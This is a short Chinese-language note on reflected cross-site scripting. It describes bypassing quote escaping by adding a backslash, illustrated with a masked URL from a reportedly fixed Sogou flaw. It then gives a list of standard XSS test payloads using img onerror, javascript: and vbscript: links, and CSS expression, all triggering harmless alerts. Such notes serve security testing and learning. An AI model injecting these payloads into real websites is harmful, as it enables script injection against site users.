不少xss
防御机制较为成熟,但是引号转义却不转义转义符的情况,仍然可以进行逃逸并触发反射xss
,以最近的搜狗反射xss为例来讲(已修复)
https://xxx.xxx.com/hospital/ncp/guide.html?channel=hainan\%27;alert(1);//
此处的单引号被转义,然而在单引号前加上转义符,可以导致单引号逃逸,成功闭合,触发反射xss
XSS pyload
<img src=x onerror=prompt(1)>
<img src=x onerror=confirm(1)>
<div οnmοuseenter="alert('xss')">
<a href=javascript:alert(1) />1</a>
<div style="color: '<'; color: expression(alert('XSS'))">
<a href='vbscript:MsgBox("XSS")'>link</a>
%c1;alert(/xss/);//